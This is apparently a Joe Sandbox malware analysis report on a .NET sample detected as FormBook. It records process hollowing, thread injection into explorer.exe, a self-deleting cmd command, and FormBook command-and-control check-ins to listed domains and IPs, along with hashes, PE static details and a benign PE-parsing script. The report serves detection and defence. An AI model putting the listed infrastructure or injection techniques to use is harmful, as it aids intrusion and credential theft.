      Source: C:\Users\user\Desktop\ejecutable1.exe | Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.dunedinhyperlocal.com
Source: C:\Windows\explorer.exe Domain query: www.multicoininvestment.com
Source: C:\Windows\explorer.exe Domain query: www.wwiilive.com
Source: C:\Windows\explorer.exe Domain query: www.institutosamar.com
Source: C:\Windows\explorer.exe Domain query: www.petersonmovingco.com
Source: C:\Windows\explorer.exe Domain query: www.quinnwebster.top
Source: C:\Windows\explorer.exe Domain query: www.lianxiwan.xyz
Source: C:\Windows\explorer.exe Domain query: www.oinfoproduto.com
Source: C:\Windows\explorer.exe Domain query: www.theseattlenotary.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\ejecutable1.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: BE0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\ejecutable1.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\ejecutable1.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Users\user\Desktop\ejecutable1.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\ejecutable1.exe Memory written: C:\Users\user\Desktop\ejecutable1.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\ejecutable1.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\ejecutable1.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 1764
Source: C:\Users\user\Desktop\ejecutable1.exe Process created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'
Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmp Binary or memory string: Program Manager<
Source: C:\Users\user\Desktop\ejecutable1.exe Queries volume information: C:\Users\user\Desktop\ejecutable1.exe VolumeInformation
Source: C:\Users\user\Desktop\ejecutable1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

      Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 6 1 2 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 2 2 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 3 1 | Security Account Manager | Virtualization/Sandbox Evasion 3 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 6 1 2 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 1 1 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 2 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 2 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

      Behavior Graph

Behavior graph (ID 491544, sample ejecutable1.exe, start date 27/09/2021, architecture WINDOWS, score 100). The rendered graph is not reproduced here; its nodes and edges are:
• Sample node: contacts www.lianxiwan.xyz and www.area-arquitectos.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Malicious sample detected (through community Yara rule), Multi AV Scanner detection for submitted file, 6 other signatures
• ejecutable1.exe (started): Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
• ejecutable1.exe (child process, started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
• explorer.exe (injected): oinfoproduto.com 216.172.172.208, 49167, 80, UNIFIEDLAYER-AS-1US, United States; www.lianxiwan.xyz 101.35.124.222, 80, TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN, China; 13 other IPs or domains; System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
• msdt.exe (started): Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
• cmd.exe (started): Deletes itself after installation


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

Source | Detection | Scanner | Label
ejecutable1.exe | 37% | Virustotal |
ejecutable1.exe | 13% | ReversingLabs | ByteCode-MSIL.Spyware.Noon

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

Source | Detection | Scanner | Label
2.2.ejecutable1.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

      Domains

      No Antivirus matches

      URLs


      Domains and IPs

      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
theseattlenotary.com | 162.0.232.162 | true | false | | high
www.petersonmovingco.com | 216.239.32.21 | true | false | | high
oinfoproduto.com | 216.172.172.208 | true | false | | high
www.area-arquitectos.com | 93.185.100.223 | true | false | | high
dunedinhyperlocal.com | 184.168.131.241 | true | false | | high
quinnwebster.top | 162.251.85.174 | true | false | | high
www.lianxiwan.xyz | 101.35.124.222 | true | false | | high
wwiilive.com | 34.102.136.180 | true | false | | high
multicoininvestment.com | 162.0.229.241 | true | false | | high
www.dunedinhyperlocal.com | unknown | unknown | false | | high
www.multicoininvestment.com | unknown | unknown | false | | high
www.wwiilive.com | unknown | unknown | false | | high
www.institutosamar.com | unknown | unknown | false | | high
www.quinnwebster.top | unknown | unknown | false | | high
www.oinfoproduto.com | unknown | unknown | false | | high
www.theseattlenotary.com | unknown | unknown | false | | high

                                      Contacted URLs


                                      URLs from Memory and Binaries


                                                                  Contacted IPs


                                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
101.35.124.222 | www.lianxiwan.xyz | China | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | false
162.251.85.174 | quinnwebster.top | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
162.0.229.241 | multicoininvestment.com | Canada | 22612 | NAMECHEAP-NETUS | false
216.239.32.21 | www.petersonmovingco.com | United States | 15169 | GOOGLEUS | false
34.102.136.180 | wwiilive.com | United States | 15169 | GOOGLEUS | false
184.168.131.241 | dunedinhyperlocal.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false
162.0.232.162 | theseattlenotary.com | Canada | 22612 | NAMECHEAP-NETUS | false
216.172.172.208 | oinfoproduto.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false

                                                                  General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 491544
Start date: 27.09.2021
Start time: 17:30:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 42s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: ejecutable1.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@6/0@11/8
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 21.3% (good quality ratio 20.5%)
• Quality average: 72.8%
• Quality standard deviation: 27.8%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                  Simulations

                                                                  Behavior and APIs

Time | Type | Description
17:31:14 | API Interceptor | 70x Sleep call for process: ejecutable1.exe modified
17:31:36 | API Interceptor | 194x Sleep call for process: msdt.exe modified
17:32:08 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  No context

                                                                  Domains

                                                                  No context

                                                                  ASN

                                                                  No context

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  No created / dropped files found

                                                                  Static File Info

                                                                  General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 6.737665264052285
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: ejecutable1.exe
File size: 840192
MD5: ff2724ddf0ef0525e9e419db5199e96f
SHA1: 3cda3d12e93a6e06f22e205010cb6c3d674285a1
SHA256: 5a5510cd8e0b77c01caac5b519c66d07d1621682e08179ead01adbc8d517b913
SHA512: 262a0900141207cd427a56b89a0ddf6dd81da957e7015069833662b450608a0a94551692d06bfb01d060c7f4cd5324dd2f3bf6ca36fd02ccdfc2f1b87b48353f
SSDEEP: 12288:gH/yso4G0/mo1M3d08zo70QuynqopwCtKbvygfgGvSwpNM6M9MvWdo9S7LCn1tM4:ULzIFXF+FxViEoP+h/CshCU6+S
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....NQa..............0..8...........W... ...`....@.. ....................... ............@................................

                                                                  File Icon

                                                                  Icon Hash:138e8eccece8cccc

                                                                  Static PE Info

                                                                  General

Entrypoint: 0x4b57ae
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x61514EA3 [Mon Sep 27 04:54:59 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
(followed by 97 x "add byte ptr [eax], al": the zero-filled bytes after the stub, disassembled as instructions)

The one real instruction is the standard native stub of a managed executable: an indirect jump through the 8-byte IAT at RVA 0x2000 (image base 0x400000 + 0x2000 = 0x00402000), whose single entry is mscoree.dll!_CorExeMain (see Imports below). Execution continues inside the CLR, so the native entry point says nothing about the managed code; the static signals of interest here are the .text entropy and the CLR header at RVA 0x2008 listed under Data Directories.

                                                                  Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb575c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb6000 | 0x19414 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                  Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb37b4 | 0xb3800 | False | 0.669535602368 | data | 6.99789102279 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xb6000 | 0x19414 | 0x19600 | False | 0.391635237069 | data | 4.29441902576 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd0000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
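The figures in the General, Data Directories and Sections tables above can be re-derived from the raw image. The script below is an added example, not Joe Sandbox's code and not code from the sample: it walks the PE32 headers with the standard library only, resolves the entry point and each data directory to its containing section (the "Is in Section" column), computes the same 8-bit Shannon entropy per section, converts the link timestamp to UTC, and treats a non-empty IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (the CLR header, at RVA 0x2008 in .text for this sample) as the .NET indicator. The image it parses is a minimal PE32 constructed inline, so the values it prints (entry point 0x402006, entropy 8.0 for a .text filled with every byte value, 0.0 for an all-zero .rsrc) describe that constructed input, not ejecutable1.exe; only the layout of an 8-byte IAT at 0x2000 followed by the CLR header at 0x2008 is copied from the sample.

```python
"""Added example (not Joe Sandbox's or the sample's code): re-derive the report's
Static PE Info fields from a PE32 image with the standard library only."""
import datetime
import math
import struct
from collections import Counter

DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",       # the four flags
                       0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}  # the report lists
# IMAGE_OPTIONAL_HEADER32 up to NumberOfRvaAndSizes (96 bytes); data directories follow.
OPT_HDR32 = "<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII"
SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER (40 bytes)


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 .. 8.0 (the report's Entropy)."""
    n = len(data)
    return 0.0 if n == 0 else -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_for_rva(sections: list, rva: int) -> str:
    """Name of the section whose virtual range contains rva, '' if none."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["name"]
    return ""


def parse_pe32(image: bytes) -> dict:
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[:2] != b"MZ" or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    _, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    f = struct.unpack_from(OPT_HDR32, image, opt)
    if f[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled, like the sample")
    entry_rva, image_base, dll_chars, ndirs = f[6], f[9], f[23], f[29]

    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR, image, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "rawsize": rawsize, "characteristics": chars,
                         "entropy": shannon_entropy(image[rawptr:rawptr + rawsize])})

    dirs = {}
    for i in range(min(ndirs, 16)):   # (rva, size, containing section) per directory
        rva, size = struct.unpack_from("<II", image, opt + 96 + 8 * i)
        dirs[DIRECTORY_NAMES[i]] = (rva, size, section_for_rva(sections, rva) if size else "")

    return {
        "entrypoint": image_base + entry_rva,   # the report shows the VA, not the RVA
        "entrypoint_section": section_for_rva(sections, entry_rva),
        "timestamp": timestamp,
        "timestamp_utc": datetime.datetime.fromtimestamp(
            timestamp, datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "dll_characteristics": sorted(n for b, n in DLL_CHARACTERISTICS.items() if dll_chars & b),
        # A non-empty COM_DESCRIPTOR (CLR header) is what marks a managed image.
        "is_dotnet": dirs.get("COM_DESCRIPTOR", (0, 0, ""))[1] != 0,
        "directories": dirs, "sections": sections}


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 (not the analysed file): 8-byte IAT at RVA 0x2000 and
    CLR header at 0x2008 like the sample, entry point in .text, data in .rsrc."""
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x80)).ljust(0x80, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x61514EA3, 0, 0, 0xE0, 0x0102)
    opt = struct.pack(
        OPT_HDR32,
        0x10B, 0x30, 0,                      # magic, linker version
        0x200, 0x200, 0,                     # code / initialised / uninitialised sizes
        0x2006, 0x2000, 0x3000,              # entry RVA, base of code, base of data
        0x400000, 0x1000, 0x200,             # image base, section and file alignment
        4, 0, 0, 0, 4, 0,                    # OS, image and subsystem versions
        0, 0x4000, 0x200, 0,                 # Win32 version, SizeOfImage, SizeOfHeaders, checksum
        2, 0x8540,                           # WINDOWS_GUI; NO_SEH|TS_AWARE|DYNAMIC_BASE|NX_COMPAT
        0x100000, 0x1000, 0x100000, 0x1000,  # stack / heap reserve and commit
        0, 16)                               # loader flags, NumberOfRvaAndSizes
    dirs = [(0, 0)] * 16
    dirs[2], dirs[12], dirs[14] = (0x3000, 0x100), (0x2000, 0x8), (0x2008, 0x48)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    sec = struct.pack(SECTION_HDR, b".text", 0x100, 0x2000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    sec += struct.pack(SECTION_HDR, b".rsrc", 0x100, 0x3000, 0x200, 0x400, 0, 0, 0, 0, 0x40000040)
    headers = (dos + b"PE\0\0" + coff + opt + sec).ljust(0x200, b"\0")
    text = bytes(range(256)) * 2   # every byte value equally often: entropy 8.0
    rsrc = b"\0" * 0x200           # constant bytes: entropy 0.0
    return headers + text + rsrc


if __name__ == "__main__":
    info = parse_pe32(build_sample_pe())
    print(hex(info["entrypoint"]), info["entrypoint_section"], info["is_dotnet"],
          info["timestamp_utc"], [round(s["entropy"], 3) for s in info["sections"]])
```

To run it against a real file, call parse_pe32(open(path, "rb").read()). A .text section whose entropy sits close to 8 across most of the file, as the sample's 6.998 over 0xb3800 raw bytes does, points to compressed or encrypted data stored alongside the IL rather than to plain compiled code; the ZLIB Complexity column above is the report's second measure of the same property.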

                                                                  Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0xb6180 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0xc69b8 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295 | |
RT_ICON | 0xcabf0 | 0x25a8 | data | |
RT_ICON | 0xcd1a8 | 0x10a8 | data | |
RT_ICON | 0xce260 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0xce6d8 | 0x4c | data | |
RT_VERSION | 0xce734 | 0x31c | data | |
RT_MANIFEST | 0xcea60 | 0x9b0 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators | |

                                                                  Imports

DLL | Import
mscoree.dll | _CorExeMain

                                                                  Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright F@Soft
Assembly Version | 1.0.6.2
InternalName | IDLFL.exe
FileVersion | 1.0.6.0
CompanyName | F@Soft
LegalTrademarks |
Comments |
ProductName | Darwin AW
ProductVersion | 1.0.6.0
FileDescription | Darwin AW
OriginalFilename | IDLFL.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
09/27/21-17:31:56.380230 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49165 | 80 | 192.168.2.22 | 34.102.136.180
09/27/21-17:31:56.380230 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49165 | 80 | 192.168.2.22 | 34.102.136.180
09/27/21-17:31:56.380230 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49165 | 80 | 192.168.2.22 | 34.102.136.180
09/27/21-17:31:56.559994 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49165 | 34.102.136.180 | 192.168.2.22
09/27/21-17:32:24.141268 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49169 | 80 | 192.168.2.22 | 162.0.232.162
09/27/21-17:32:24.141268 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49169 | 80 | 192.168.2.22 | 162.0.232.162
09/27/21-17:32:24.141268 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49169 | 80 | 192.168.2.22 | 162.0.232.162
09/27/21-17:33:11.306293 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49174 | 80 | 192.168.2.22 | 93.185.100.223
09/27/21-17:33:11.306293 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49174 | 80 | 192.168.2.22 | 93.185.100.223
09/27/21-17:33:11.306293 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49174 | 80 | 192.168.2.22 | 93.185.100.223

                                                                  Network Port Distribution

                                                                  TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 17:31:56.365921974 CEST | 49165 | 80 | 192.168.2.22 | 34.102.136.180
Sep 27, 2021 17:31:56.379745007 CEST | 80 | 49165 | 34.102.136.180 | 192.168.2.22
Sep 27, 2021 17:31:56.379933119 CEST | 49165 | 80 | 192.168.2.22 | 34.102.136.180
Sep 27, 2021 17:31:56.380229950 CEST | 49165 | 80 | 192.168.2.22 | 34.102.136.180
Sep 27, 2021 17:31:56.393846989 CEST | 80 | 49165 | 34.102.136.180 | 192.168.2.22
Sep 27, 2021 17:31:56.559993982 CEST | 80 | 49165 | 34.102.136.180 | 192.168.2.22
Sep 27, 2021 17:31:56.560043097 CEST | 80 | 49165 | 34.102.136.180 | 192.168.2.22
Sep 27, 2021 17:31:56.560276031 CEST | 49165 | 80 | 192.168.2.22 | 34.102.136.180
Sep 27, 2021 17:31:56.560431004 CEST | 49165 | 80 | 192.168.2.22 | 34.102.136.180
Sep 27, 2021 17:31:56.874114037 CEST | 49165 | 80 | 192.168.2.22 | 34.102.136.180
Sep 27, 2021 17:31:56.887252092 CEST | 80 | 49165 | 34.102.136.180 | 192.168.2.22
Sep 27, 2021 17:32:01.604357958 CEST | 49166 | 80 | 192.168.2.22 | 184.168.131.241
Sep 27, 2021 17:32:01.790163994 CEST | 80 | 49166 | 184.168.131.241 | 192.168.2.22
Sep 27, 2021 17:32:01.790251017 CEST | 49166 | 80 | 192.168.2.22 | 184.168.131.241
Sep 27, 2021 17:32:01.790482998 CEST | 49166 | 80 | 192.168.2.22 | 184.168.131.241
Sep 27, 2021 17:32:01.975771904 CEST | 80 | 49166 | 184.168.131.241 | 192.168.2.22
Sep 27, 2021 17:32:02.171308994 CEST | 80 | 49166 | 184.168.131.241 | 192.168.2.22
Sep 27, 2021 17:32:02.172131062 CEST | 80 | 49166 | 184.168.131.241 | 192.168.2.22
Sep 27, 2021 17:32:02.172543049 CEST | 49166 | 80 | 192.168.2.22 | 184.168.131.241
Sep 27, 2021 17:32:02.172714949 CEST | 49166 | 80 | 192.168.2.22 | 184.168.131.241
Sep 27, 2021 17:32:02.358375072 CEST | 80 | 49166 | 184.168.131.241 | 192.168.2.22
Sep 27, 2021 17:32:07.351763964 CEST | 49167 | 80 | 192.168.2.22 | 216.172.172.208
Sep 27, 2021 17:32:07.490724087 CEST | 80 | 49167 | 216.172.172.208 | 192.168.2.22
Sep 27, 2021 17:32:07.490979910 CEST | 49167 | 80 | 192.168.2.22 | 216.172.172.208
Sep 27, 2021 17:32:07.491132975 CEST | 49167 | 80 | 192.168.2.22 | 216.172.172.208
Sep 27, 2021 17:32:07.637655973 CEST | 80 | 49167 | 216.172.172.208 | 192.168.2.22
Sep 27, 2021 17:32:08.474100113 CEST | 80 | 49167 | 216.172.172.208 | 192.168.2.22
